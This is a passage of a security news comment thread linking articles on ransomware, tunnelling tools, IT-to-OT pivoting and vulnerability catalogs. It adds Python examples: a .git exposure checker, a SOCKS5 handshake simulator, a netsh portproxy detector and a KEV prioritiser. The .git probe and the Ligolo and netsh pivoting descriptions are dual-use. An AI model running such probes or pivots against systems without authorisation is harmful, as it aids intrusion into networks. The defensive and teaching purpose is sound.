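            results[path] = looks_like_git_head(body)
        else:
            results[path] = looks_like_git_config(body)
    return results


def is_exposed(results: Dict[str, bool]) -> bool:
    return any(results.values())


# --- constructed sample responses for an offline run -------------------
SAMPLE_SITES = {
    "https://leaky.example/.git/HEAD": "ref: refs/heads/main\n",
    "https://leaky.example/.git/config": (
        "[core]\n\trepositoryformatversion = 0\n\tbare = false\n"
        "[remote \"origin\"]\n\turl = https://git.example/app.git\n"
    ),
    # soft 404: answers 200 with an HTML page for every path
    "https://soft404.example/.git/HEAD": "<html><body>Not found</body></html>",
    "https://soft404.example/.git/config": "<html><body>Not found</body></html>",
}


def sample_fetch(url: str) -> Optional[str]:
    return SAMPLE_SITES.get(url)


def urllib_fetch(url: str, timeout: float = 5.0) -> Optional[str]:
    """Real fetcher for use outside the offline sample (stdlib only)."""
    import urllib.error
    import urllib.request
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            if resp.status != 200:
                return None
            return resp.read().decode("utf-8", "replace")
    except urllib.error.URLError:
        return None


if __name__ == "__main__":
    for site in ("https://leaky.example", "https://soft404.example"):
        res = check_exposed_git(site, sample_fetch)
        print(site, "EXPOSED" if is_exposed(res) else "ok", res)
```

Swap `sample_fetch` for `urllib_fetch` to run it against your own hosts. The fix on the server side is to deploy build artifacts rather than a checkout, and to refuse the path regardless (for nginx, a `location ~ /\.git { return 404; }` block); rotating any credential that was ever committed is still required once exposure is confirmed, since the history is what leaks.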
  28. Tomi Engdahl says:

    Hackers fork open-source reverse tunneling tool for persistence https://www.bleepingcomputer.com/news/security/hackers-fork-open-source-reverse-tunneling-tool-for-persistence/
    Security experts have spotted an interesting case of a suspected ransomware attack that employed custom-made tools typically used by APT (advanced persistent threat) groups. Although no concrete connection between groups has been uncovered, the operational tactics, targeting scope, and malware customization capabilities signify a potential connection. See also:
    https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf

    https://github.com/sysdream/ligolo
    Ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptic curve).
    It is comparable to Meterpreter with Autoroute + Socks4a, but more stable and faster.
    You compromised a Windows / Linux / Mac server during your external audit. This server is located inside a LAN network and you want to establish connections to other machines on this network.
    Ligolo can setup a tunnel to access internal server’s resources.

    Reply
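The "SOCKS5 tunnel from a reverse connection" in the Ligolo description above means the implant on the compromised host speaks the RFC 1928 SOCKS5 protocol to the operator and forwards each CONNECT to the internal LAN. The block below is an added example, not Ligolo's code or the SecJoes report's: a minimal encoder and decoder for both sides of that handshake (client greeting, server method selection, CONNECT request, server reply), run in memory so the exact bytes are visible. The hosts and the `allow` policy are constructed for the example.

```python
"""Added example: the SOCKS5 handshake a reverse tunnel such as Ligolo
carries (RFC 1928, no-auth method only). Not Ligolo's code; both sides
are simulated in memory so the wire bytes can be inspected.
"""
import socket
import struct
from typing import Callable, List, Tuple

SOCKS_VER = 0x05
NO_AUTH, NO_ACCEPTABLE = 0x00, 0xFF
CMD_CONNECT = 0x01
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04
REP_SUCCEEDED, REP_NOT_ALLOWED = 0x00, 0x02


def client_greeting(methods=(NO_AUTH,)) -> bytes:
    """VER | NMETHODS | METHODS..."""
    return bytes([SOCKS_VER, len(methods), *methods])


def server_method_select(greeting: bytes) -> bytes:
    """VER | METHOD ; 0xFF means no acceptable method."""
    if len(greeting) < 2 or greeting[0] != SOCKS_VER or len(greeting) != 2 + greeting[1]:
        raise ValueError("malformed greeting")
    chosen = NO_AUTH if NO_AUTH in greeting[2:] else NO_ACCEPTABLE
    return bytes([SOCKS_VER, chosen])


def connect_request(host: str, port: int) -> bytes:
    """VER | CMD | RSV | ATYP | DST.ADDR | DST.PORT ; ATYP chosen from host."""
    try:
        atyp, encoded = ATYP_IPV4, socket.inet_pton(socket.AF_INET, host)
    except OSError:
        try:
            atyp, encoded = ATYP_IPV6, socket.inet_pton(socket.AF_INET6, host)
        except OSError:
            raw = host.encode("idna")
            if len(raw) > 255:
                raise ValueError("hostname too long for SOCKS5")
            atyp, encoded = ATYP_DOMAIN, bytes([len(raw)]) + raw
    return bytes([SOCKS_VER, CMD_CONNECT, 0x00, atyp]) + encoded + struct.pack("!H", port)


def parse_request(data: bytes) -> Tuple[int, str, int]:
    """Server side: decode (cmd, host, port); raises ValueError on junk."""
    if len(data) < 4 or data[0] != SOCKS_VER:
        raise ValueError("not a SOCKS5 request")
    cmd, atyp = data[1], data[3]
    if atyp == ATYP_IPV4:
        host, end = socket.inet_ntop(socket.AF_INET, data[4:8]), 8
    elif atyp == ATYP_IPV6:
        host, end = socket.inet_ntop(socket.AF_INET6, data[4:20]), 20
    elif atyp == ATYP_DOMAIN:
        n = data[4]
        host, end = data[5:5 + n].decode("idna"), 5 + n
    else:
        raise ValueError(f"unknown ATYP {atyp:#x}")
    if len(data) != end + 2:
        raise ValueError("bad request length")
    (port,) = struct.unpack("!H", data[end:end + 2])
    return cmd, host, port


def server_reply(rep: int, bound_ip: str = "0.0.0.0", bound_port: int = 0) -> bytes:
    """VER | REP | RSV | ATYP | BND.ADDR | BND.PORT"""
    return (bytes([SOCKS_VER, rep, 0x00, ATYP_IPV4])
            + socket.inet_pton(socket.AF_INET, bound_ip) + struct.pack("!H", bound_port))


def simulate_connect(host: str, port: int,
                     allow: Callable[[str, int], bool]) -> Tuple[List[Tuple[str, bytes]], tuple]:
    """Run both sides in memory. Returns (transcript, (cmd, host, port, rep))."""
    transcript: List[Tuple[str, bytes]] = []
    g = client_greeting()
    transcript.append(("C->S", g))
    transcript.append(("S->C", server_method_select(g)))
    req = connect_request(host, port)
    transcript.append(("C->S", req))
    cmd, h, p = parse_request(req)
    rep = REP_SUCCEEDED if cmd == CMD_CONNECT and allow(h, p) else REP_NOT_ALLOWED
    transcript.append(("S->C", server_reply(rep)))
    return transcript, (cmd, h, p, rep)


if __name__ == "__main__":
    # constructed target inside the LAN reached through the implant
    trace, decoded = simulate_connect("10.0.0.5", 445, lambda h, p: p != 22)
    for direction, payload in trace:
        print(direction, payload.hex(" "))
    print("decoded:", decoded)
```

In a real deployment only the endpoints see these bytes: the README quoted above says the reverse connection itself is TLS-wrapped, so a network sensor observes a single outbound TLS session from the foothold, not SOCKS. Detection therefore leans on the host (an unexpected process holding a long-lived outbound connection) and on the `allow` side of this exchange, which is where an operator's tooling restricts what the implant will forward.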
  29. Tomi Engdahl says:

    Pivoting Between Corporate IT and OT Networks with Network Shell https://www.dragos.com/blog/pivoting-between-corporate-it-and-ot-networks-with-network-shell/
    Often during a penetration test, one of the primary objectives is to find a way to pivot from the corporate network to the operational technology (OT)/SCADA networks. The reason for this objective is that it is unlikely that an adversary can cause an operational impact with access limited to the corporate IT networks. While pivoting to OT networks is not a trivial task, it is often aided by poor security hygiene like weak network perimeters and shared credentials. This blog explores one way an adversary may leverage the Network Shell (Netsh) utility to exploit weak network segmentation and gain access to OT networks.

    Reply
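The Netsh technique the Dragos post describes is the built-in `netsh interface portproxy` feature: a Windows host with a foot in both the IT and OT networks is told to listen on one port and relay the connection to an address on the other side, which defeats segmentation that only looks at the source address. The parser below is an added example for this page, not Dragos code. It reads the text output of `netsh interface portproxy show all`, which is the quickest thing to pull from every dual-homed host, and flags forwards whose destination lies in an OT address range or on a common ICS protocol port. The sample output, the OT ranges and the host roles are all constructed; check the column layout against your own Windows build before trusting it at scale.

```python
"""Added example: parse `netsh interface portproxy show all` output and
flag port forwards that reach into OT. Not Dragos code; the sample
output, OT ranges and ICS port list are constructed for the example.
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class PortProxy:
    family: str          # e.g. "v4tov4", taken from the section header
    listen_addr: str
    listen_port: int
    connect_addr: str    # IP or hostname, as netsh prints it
    connect_port: int


_HEADER = re.compile(r"Listen on (ipv[46]):\s+Connect to (ipv[46]):", re.I)


def parse_portproxy(text: str) -> List[PortProxy]:
    entries: List[PortProxy] = []
    family = "unknown"
    for line in text.splitlines():
        m = _HEADER.search(line)
        if m:
            family = f"v{m.group(1)[-1]}tov{m.group(2)[-1]}"
            continue
        parts = line.split()
        # data rows are exactly: listen-addr listen-port connect-addr connect-port
        if len(parts) != 4 or not (parts[1].isdigit() and parts[3].isdigit()):
            continue
        try:
            ipaddress.ip_address(parts[0])      # skips the "Address Port" heading
        except ValueError:
            continue
        entries.append(PortProxy(family, parts[0], int(parts[1]), parts[2], int(parts[3])))
    return entries


# constructed OT ranges for the example; replace with your own asset data
OT_RANGES = [ipaddress.ip_network(n) for n in ("10.10.0.0/16", "192.168.100.0/24")]
# Modbus/TCP, S7comm, DNP3, EtherNet/IP, OPC UA
OT_PORTS = {502, 102, 20000, 44818, 4840}


def suspicious(entries: List[PortProxy],
               ot_ranges=OT_RANGES, ot_ports=OT_PORTS) -> List[Tuple[PortProxy, List[str]]]:
    hits = []
    for e in entries:
        reasons: List[str] = []
        try:
            dst = ipaddress.ip_address(e.connect_addr)
            if any(dst in net for net in ot_ranges):
                reasons.append("connect address inside OT range")
        except ValueError:
            reasons.append("connect address is a hostname; resolve and re-check")
        if e.connect_port in ot_ports:
            reasons.append(f"connect port {e.connect_port} is an ICS protocol port")
        if reasons and e.listen_addr in ("0.0.0.0", "::"):
            reasons.append("listener bound to all interfaces")
        if reasons:
            hits.append((e, reasons))
    return hits


# constructed sample of `netsh interface portproxy show all` on a dual-homed host
SAMPLE_OUTPUT = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
0.0.0.0         3389        10.10.20.15     3389
127.0.0.1       8080        172.16.5.5      8080
0.0.0.0         5020        10.10.30.7      502
"""

if __name__ == "__main__":
    for entry, why in suspicious(parse_portproxy(SAMPLE_OUTPUT)):
        print(f"{entry.listen_addr}:{entry.listen_port} -> "
              f"{entry.connect_addr}:{entry.connect_port} ({entry.family}): {'; '.join(why)}")
```

The same table is persisted under `HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp`, so a registry-monitoring rule on that key catches the `netsh interface portproxy add` that creates an entry, while this parser catches what already exists on hosts that were configured before monitoring was in place.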
  30. Tomi Engdahl says:

    Incidents Handling and Cybercrime Investigations https://www.enisa.europa.eu/news/enisa-news/incidents-handling-and-cybercrime-investigations
    The European Union Agency for Cybersecurity (ENISA) explores how CSIRTs, law enforcement agencies and the judiciary cooperate and how they can train together to better tackle cyber incidents and respond to cybercrime. The report facilitates the cooperation between CSIRTs and law enforcement agencies (LEAs) and looks into their interaction with the judiciary (judges and prosecutors). This updated and extended version of the report comes along with an updated version of the training material delivered by ENISA in 2020 in the form of a handbook and a toolset.

    Reply
  31. Tomi Engdahl says:

    Why You Need a Diversity and Inclusion Program in Cybersecurity https://securityintelligence.com/articles/why-you-need-diversity-inclusion-program-cybersecurity/
    When talking about security, it’s easy to focus on the tools and technologies. After all, they’re what we use to keep apps, data and infrastructure secure. And when we do talk about people, it’s often about the skills. Once in a while, we focus on how employees often contribute to cyberattacks with poor cyber habits and need ongoing cybersecurity training. But at the core of all cybersecurity programs and efforts is a team of people. They work together to design the processes and strategy. In short, people are at the heart of the larger digital transformation and the related digital safety efforts.
    And many cybersecurity discussions overlook the importance of creating a diverse and inclusive team.

    Reply
  32. Tomi Engdahl says:

    This is how Russia could strike: these are the cyber threats facing Finland https://www.is.fi/digitoday/tietoturva/art-2000008670405.html
    According to experts, Finland’s ability to defend against cyberattacks is good, but there is a lot to defend. Finland trains for these threats all the time.

    National Emergency Supply Agency: “There may be a shortage of cyber experts, fertilisers and natural gas”
    https://yle.fi/uutiset/3-12350826
    Russia’s attack on Ukraine has thus also been reflected in the cybersecurity situation. Has readiness been raised on that side as well? – Despite the Ukraine crisis, the national cybersecurity situation is normal. Various denial-of-service attacks take place in the networks all the time, and different kinds of malware are constantly in circulation. Users hardly notice them, because the authorities and business actors handle them with their own measures. This describes Finland’s preparedness, Paananen says. – There is a significant shortage of cybersecurity experts. Skilled people are what is needed, Paananen says.

    Reply
  33. Tomi Engdahl says:

    Russia May Use Ransomware Payouts to Avoid Sanctions https://threatpost.com/russia-ransomware-payouts-avoid-sanctions/178854/
    FinCEN warns financial institutions to beware of unusual cryptocurrency payments or illegal transactions Russia may use to evade restrictions imposed due to its invasion of Ukraine. FinCEN Alert:
    https://www.fincen.gov/sites/default/files/2022-03/FinCEN%20Alert%20Russian%20Sanctions%20Evasion%20FINAL%20508.pdf

    Reply
  34. Tomi Engdahl says:

    Cyberattacks highlight risks to physical and digital supply chains https://therecord.media/kojima-nvidia-samsung-cybersecurity-supply-chain/
    A string of recent cyberattacks and data leaks, including those targeting a supplier for Toyota Motors, major chipmaker NVIDIA, and international electronics giant Samsung, are putting renewed focus on cybersecurity vulnerabilities in the physical and digital supply chains relied on around the world. These are forms of supply chain cyberattacks – attacks that target weak links in software systems and use them to access bigger, more secure, and more established companies or targets.

    Reply
  35. Tomi Engdahl says:

    Russia creates its own TLS certificate authority to bypass sanctions https://www.bleepingcomputer.com/news/security/russia-creates-its-own-tls-certificate-authority-to-bypass-sanctions/
    Russia has created its own trusted TLS certificate authority (CA) to solve website access problems that have been piling up after sanctions prevent certificate renewals. However, for new Certificate Authorities (CA) to be trusted by web browsers, they first needed to be vetted by various companies, which can take a long time. Currently, the only web browsers that recognize Russia’s new CA as trustworthy are the Russia-based Yandex browser and Atom products, so Russian users are told to use these instead of Chrome, Firefox, Edge, etc.

    Reply
  36. Tomi Engdahl says:

    The most common malware in Finland and worldwide, with the war in Ukraine as bait: these sectors are now the most frequent targets of cyberattacks https://www.epressi.com/tiedotteet/tietotekniikka/yleisimmat-haittaohjelmat-suomessa-ja-maailmalla-syottina-ukrainan-sota-nama-alat-ovat-nyt-useimmin-kyberhyokkaysten-kohteena.html
    Check Point Research reports in its February malware review that the world’s most common malware was Emotet, which lures people interested in topics related to the war in Ukraine into downloading malicious email attachments. The most common cyber nuisance in Finland in February was the Netwalker ransomware.

    Reply
  37. Tomi Engdahl says:

    Introducing the new ‘Defending Against Critical Threats’ report https://blogs.cisco.com/security/introducing-the-new-defending-against-critical-threats-report
    Today, we’re pleased to launch our annual Defending Against Critical Threats report. Inside, we cover the most significant vulnerabilities and incidents of 2021, with expert analysis, insights and predictions from our security and threat intelligence teams across Cisco Talos, Duo Security, Kenna Security, and Cisco Umbrella.

    Reply
  38. Tomi Engdahl says:

    From Cyber Threats to Cyber Talent, Insights From the Front Lines
    https://www.securityweek.com/cyber-threats-cyber-talent-insights-front-lines

    A conversation with Callie Guenther, cyber threat intelligence (CTI) manager at Critical Start

    Closing the cybersecurity workforce gap has been a top concern for more than a decade. But it has become more urgent given the escalation in cyberattacks over the last two years, punctuated by recent geopolitical events. Diversity is key to both expanding the talent pool and providing different perspectives as the threat landscape evolves. As a woman of color with a strong political science and cyber threat intelligence (CTI) background, Callie Guenther is uniquely positioned to offer valuable insights on these topics. Callie, CTI Manager at Critical Start, leads a team responsible for intelligence operations across the Cyber Research Unit, managing the entire intelligence lifecycle to provide relevant CTI to internal and external stakeholders.

    Reply
  39. Tomi Engdahl says:

    All About the Bots: What Botnet Trends Portend for Security Pros
    https://www.securityweek.com/all-about-bots-what-botnet-trends-portend-security-pros

    Protecting your organization against botnet threats requires a holistic, integrated approach to security

    Botnets have become a fixture in the threat landscape, but they aren’t primarily focused on DDoS attacks anymore. Nowadays, they’re in a state of evolution as they learn and use newer, more evolved cybercriminal attack techniques. They have become multi-purpose attack vehicles using an assortment of more sophisticated attack techniques, including ransomware.

    For example, threat actors – including operators of botnets like Mirai – integrated exploits for the Log4j vulnerability into their attack kits. Let’s take a look at what we’re seeing and what these trends mean for security professionals and their respective organizations.

    Reply
  40. Tomi Engdahl says:

    Why You Should Be Using CISA’s Catalog of Exploited Vulns
    It’s a great starting point for organizations that want to ride the wave of risk-based vulnerability management rather than drowning beneath it.
    https://www.darkreading.com/vulnerabilities-threats/why-you-should-be-using-cisa-s-catalog-of-exploited-vulns

    Reply
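The point of the KEV catalog in the Dark Reading piece above is that "exploited in the wild, with a remediation due date" is a better first sort key than CVSS alone. The following is an added example of that join, written for this page and not code from CISA or Dark Reading: it loads an excerpt in the shape of CISA's public `known_exploited_vulnerabilities.json` feed, matches it against a scanner's findings, and orders hosts by KEV status, due date and then CVSS. The catalog excerpt, the findings and the `CVE-0000-*` identifiers are constructed; the Log4Shell entry follows the real feed's fields from memory and should be checked against the live catalog before use.

```python
"""Added example: prioritise scanner findings with CISA's KEV catalog.

Not CISA's or Dark Reading's code. The catalog excerpt and findings are
constructed; field names follow the public known_exploited_vulnerabilities.json
feed at https://www.cisa.gov/known-exploited-vulnerabilities-catalog.
"""
import json
from datetime import date
from typing import Dict, List

# Constructed excerpt in the feed's shape. CVE-0000-* IDs are placeholders.
KEV_JSON = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "vulnerabilities": [
        {"cveID": "CVE-2021-44228", "vendorProject": "Apache", "product": "Log4j2",
         "vulnerabilityName": "Apache Log4j2 Remote Code Execution Vulnerability",
         "dateAdded": "2021-12-10", "dueDate": "2021-12-24",
         "requiredAction": "Apply updates per vendor instructions."},
        {"cveID": "CVE-0000-1111", "vendorProject": "ExampleCo", "product": "FileServer",
         "vulnerabilityName": "constructed entry", "dateAdded": "2022-02-15",
         "dueDate": "2022-03-01", "requiredAction": "Apply updates per vendor instructions."},
        {"cveID": "CVE-0000-2222", "vendorProject": "ExampleCo", "product": "Database",
         "vulnerabilityName": "constructed entry", "dateAdded": "2022-03-03",
         "dueDate": "2022-04-15", "requiredAction": "Apply updates per vendor instructions."},
    ],
})

# Constructed scanner output: one row per host/CVE pair.
FINDINGS = [
    {"host": "app-01", "cve": "CVE-2021-44228", "cvss": 10.0},
    {"host": "db-02", "cve": "CVE-0000-2222", "cvss": 7.5},   # in KEV, due later
    {"host": "web-03", "cve": "CVE-0000-9999", "cvss": 9.8},  # not in KEV
    {"host": "fs-04", "cve": "CVE-0000-1111", "cvss": 6.5},   # in KEV, overdue
]


def load_kev(text: str) -> Dict[str, dict]:
    """Index the feed by CVE ID."""
    data = json.loads(text)
    return {v["cveID"]: v for v in data["vulnerabilities"]}


def prioritize(findings: List[dict], kev: Dict[str, dict], today: date) -> List[dict]:
    """Order findings: KEV entries first (earliest due date, then CVSS),
    then everything else by CVSS. Each row gains 'tier' and 'due'."""
    rows = []
    for f in findings:
        entry = kev.get(f["cve"])
        if entry:
            due = date.fromisoformat(entry["dueDate"])
            tier = "P0-overdue" if due < today else "P1-exploited"
            key = (0, due, -f["cvss"])
            due_str = entry["dueDate"]
        else:
            tier = "P2-critical-cvss" if f["cvss"] >= 9.0 else "P3-backlog"
            key = (1, date.max, -f["cvss"])
            due_str = None
        rows.append((key, {**f, "tier": tier, "due": due_str}))
    rows.sort(key=lambda r: r[0])
    return [r[1] for r in rows]


def overdue_hosts(findings: List[dict], kev: Dict[str, dict], today: date) -> List[str]:
    """Hosts with a KEV entry whose federal due date has already passed."""
    return [r["host"] for r in prioritize(findings, kev, today) if r["tier"] == "P0-overdue"]


if __name__ == "__main__":
    catalog = load_kev(KEV_JSON)
    for row in prioritize(FINDINGS, catalog, date(2022, 3, 10)):
        print(f"{row['tier']:<18} {row['host']:<8} {row['cve']:<16} "
              f"cvss={row['cvss']:<5} due={row['due']}")
```

Note what the ordering does to `web-03`: a CVSS 9.8 finding with no known exploitation sorts below a CVSS 6.5 finding that is on the catalog and past its due date, which is exactly the "ride the wave rather than drown" trade the article argues for. In production, replace `KEV_JSON` with the downloaded feed and refresh it daily, since entries are added as exploitation is observed.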
  41. Tomi Engdahl says:

    How an OSPO Can Help Secure Your Software Supply Chain
    https://thenewstack.io/how-an-ospo-can-help-secure-your-software-supply-chain/

    It’s nearly impossible these days to build software without using open source code. But all that free software carries additional security risks.

    Organizations grapple with how best to secure their open source software supply chain. But there’s another problem: Many companies don’t even know how many open source applications they have — or what’s in them.

    The worst-case scenarios include debacles like 2021’s Log4j security vulnerability, or what happened with SolarWinds’ proprietary Orion network monitoring product, which was infected with malware in 2020.

    For companies that build and ship software, the best practice is to “ship what you know and know what you ship,”

    Reply
  42. Tomi Engdahl says:

    SEC proposes four-day rule for public companies to report cyberattacks
    And it’ll be in an 8-K for all to see
    https://www.theregister.com/2022/03/09/sec_cyberattack_disclosure/

    Reply
  43. Tomi Engdahl says:

    How to finally secure the software supply chain
    By Dr Simon Wiseman
    Keeping things secure with third-party code
    https://www.techradar.com/features/how-to-finally-secure-the-software-supply-chain

    Reply
  44. Tomi Engdahl says:

    Encryption meant to protect against quantum hackers is easily cracked
    https://www.scientiststudy.com/2022/03/encryption-meant-to-protect-against.html

    Reply
  45. Tomi Engdahl says:

    How artificial intelligence is influencing the arms race in cybersecurity
    Everything in excess is dangerous, so is A.I.
    https://interestingengineering.com/artificial-intelligence-cybersecurity

    Reply
  46. Tomi Engdahl says:

    Understanding How Hackers Recon
    https://thehackernews.com/2022/03/understanding-how-hackers-recon.html

    Cyber-attacks keep increasing and evolving but, regardless of the degree of complexity used by hackers to gain access, get a foothold, cloak their malware, execute their payload or exfiltrate data, their attack will begin with reconnaissance. They will do their utmost to uncover exposed assets and probe their target’s attack surface for gaps that can be used as entry points.

    So, the first line of defense is to limit the potentially useful information available to a potential attacker as much as possible. As always, the tug of war between operational necessity and security concerns needs to be taken into account, which requires a better understanding of the type of information typically leveraged.

    Reply
  47. Tomi Engdahl says:

    Researchers from JFrog’s Security Research team discovered five vulnerabilities in the PJSIP open-source multimedia communication library.
    https://securityaffairs.co/wordpress/128603/hacking/pjsip-library-critical-flaws.html

    Reply
  48. Tomi Engdahl says:

    I came across this kind of scheme while following the news:

    “… In September 2019, Chinese delegates from telecom giant Huawei pitched [a new internet protocol](https://www.huawei.com/en/technology-insights/industry-insights/innovation/new-ip#:~:text=What%20is%20New%20IP%3F,future%20digital%20industry%20and%20society.)(IP) at the ITU. Western countries voted down the resolution, an unusual case in the standard-setting sector, where decisions are typically taken via consensus … Beijing is pushing for a system of loosely interconnected networks, each with specific rules enforced via a massive VPN. That would create control points able to decrypt communications, enforce or shut down traffic. … ”
    https://www.euractiv.com/section/digital/news/china-russia-prepare-new-push-for-state-controlled-internet/

    Reply
  49. Tomi Engdahl says:

    Senate approves historic cyber incident reporting bill, sends to Biden’s desk https://therecord.media/senate-approves-historic-cyber-incident-reporting-bill-sends-to-bidens-desk/
    The Senate on Thursday passed landmark legislation that will mandate critical infrastructure operators alert the federal government when they are hacked or make a ransomware payment.

    Reply
